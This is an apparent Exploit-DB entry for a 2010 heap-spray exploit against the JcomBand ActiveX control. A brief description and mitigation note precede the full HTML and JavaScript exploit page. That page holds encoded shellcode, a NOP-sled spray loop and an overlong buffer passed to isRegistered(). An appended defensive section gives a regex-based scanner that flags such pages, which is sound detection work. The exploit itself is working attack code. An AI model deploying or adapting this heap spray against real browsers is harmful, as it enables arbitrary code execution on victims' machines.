vendor: N/A
by: germaya_x & D3V!L FUCKER
CVSS: 7.5 (HIGH)
Type: Heap Spray
CWE: 119
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

JcomBand Exploit (heap spray)

This exploit is a heap spray attack that uses malicious JavaScript to place shellcode in the memory of the vulnerable system. The script is embedded in an HTML page that also instantiates an ActiveX control (CLSID 952E3F80-0C34-48CD-829B-A45913B29670). When the page is opened, the script runs, fills the heap with blocks of NOPs followed by the shellcode, and then passes a long buffer of repeated %0a%0a%0a%0a values to the control's isRegistered() method. The shellcode is then used to execute arbitrary code on the vulnerable system.

Mitigation:

Disable JavaScript in the browser, use a web application firewall, and apply the latest security patches.
Source

Exploit-DB raw data:

<html>
 <head>
  <title>JcomBand Exploit (heap spray) </title>
<object classid='clsid:952E3F80-0C34-48CD-829B-A45913B29670' id='test'></object>
<script language='javascript'>
    // Author:    [germaya_x & D3V!L FUCKER]
    // Version:   [2.5]
    // special thanx: [for my best friend his0k4].
    // Geetz [2] :[Sarbot511 ,thrid-devil].

    //calc from metasploit
     shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

     nops=unescape('%u9090%u9090');
     headersize =20;
     slackspace= headersize + shellcode.length;
     
     //Filling the header of our block with nops
    while(nops.length< slackspace) nops+= nops;
   
     fillblock= nops.substring(0, slackspace);
     
     block= nops.substring(0, nops.length- slackspace);
     
    while( block.length+ slackspace<0x40000) block= block+ block+ fillblock;
   
    //Creating new memory array.
     memory=new Array();
     
     //Filling the memory array with the nops + shellcode.
    for( counter=0; counter<300; counter++) memory[counter]= block + shellcode;
   
    // the ret is the address of our shellcode in the heap.
     ret='%0a%0a%0a%0a';
     
     // filling our buffer with the ret address
    for( counter=0; counter<=50; counter++) ret+=unescape('%0a%0a%0a%0a');
   
    // passing the buffer argument to the control's isRegistered() method (the call made on the next line).
    test.isRegistered(ret);
</script>
</head>
</html>
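
Added example (not part of the original Exploit-DB entry): a static triage check a defender could run over captured HTML to flag the script patterns the page above relies on. The rule names, the three-hit threshold, and both sample pages (with a placeholder CLSID and placeholder bytes) are constructed for illustration.

```javascript
// Static triage for heap-spray pages. Rule names and the threshold of 3
// are assumptions for this example, not an established standard.
const RULES = [
  // <object classid='clsid:...'> instantiates an ActiveX control.
  ['activex-object', /<object[^>]+classid\s*=\s*['"]?clsid:[0-9a-f-]{36}/i],
  // unescape() of %uXXXX pairs builds raw bytes inside a JS string.
  ['unescape-unicode', /unescape\(\s*['"](?:%u[0-9a-f]{4}){2,}/i],
  // Repeated filler words commonly used as a NOP-style sled.
  ['sled-filler', /(?:%u(?:9090|0a0a|0c0c|0d0d)){2,}/i],
  // A while loop growing a string until it reaches a large hex size.
  ['string-doubling', /while\s*\([^)]*length[^)]*<\s*0x[0-9a-f]{4,}\s*\)[^;]*\+/i],
  // A counted loop storing the same concatenated string in many array slots.
  ['array-fill', /for\s*\([^)]*<\s*=?\s*\d{2,}[^)]*\)\s*\{?\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+/i],
];

// Returns the names of the rules that matched and a coarse verdict.
function scan(html) {
  const hits = RULES.filter(([, re]) => re.test(html)).map(([name]) => name);
  const verdict = hits.length >= 3 ? 'likely-heap-spray'
                : hits.length ? 'review' : 'clean';
  return { hits, verdict };
}

// Constructed sample: same structure as the page above, placeholder bytes only.
const SPRAY_SAMPLE = `
<object classid='clsid:00000000-0000-0000-0000-000000000000' id='ctl'></object>
<script>
  payload = unescape('%u4141%u4141');
  nops = unescape('%u9090%u9090');
  while (block.length + 64 < 0x40000) block = block + block;
  for (i = 0; i < 300; i++) memory[i] = block + payload;
</script>`;

// Constructed sample: an ordinary page that embeds a control but does no spraying.
const BENIGN_SAMPLE = `
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script>
  var name = unescape('Jane%20Doe');
  for (var i = 0; i < 10; i++) total += i;
</script>`;

console.log(scan(SPRAY_SAMPLE), scan(BENIGN_SAMPLE));
```

A single hit such as `activex-object` only marks a page for review; the verdict escalates when the spray-building patterns appear together.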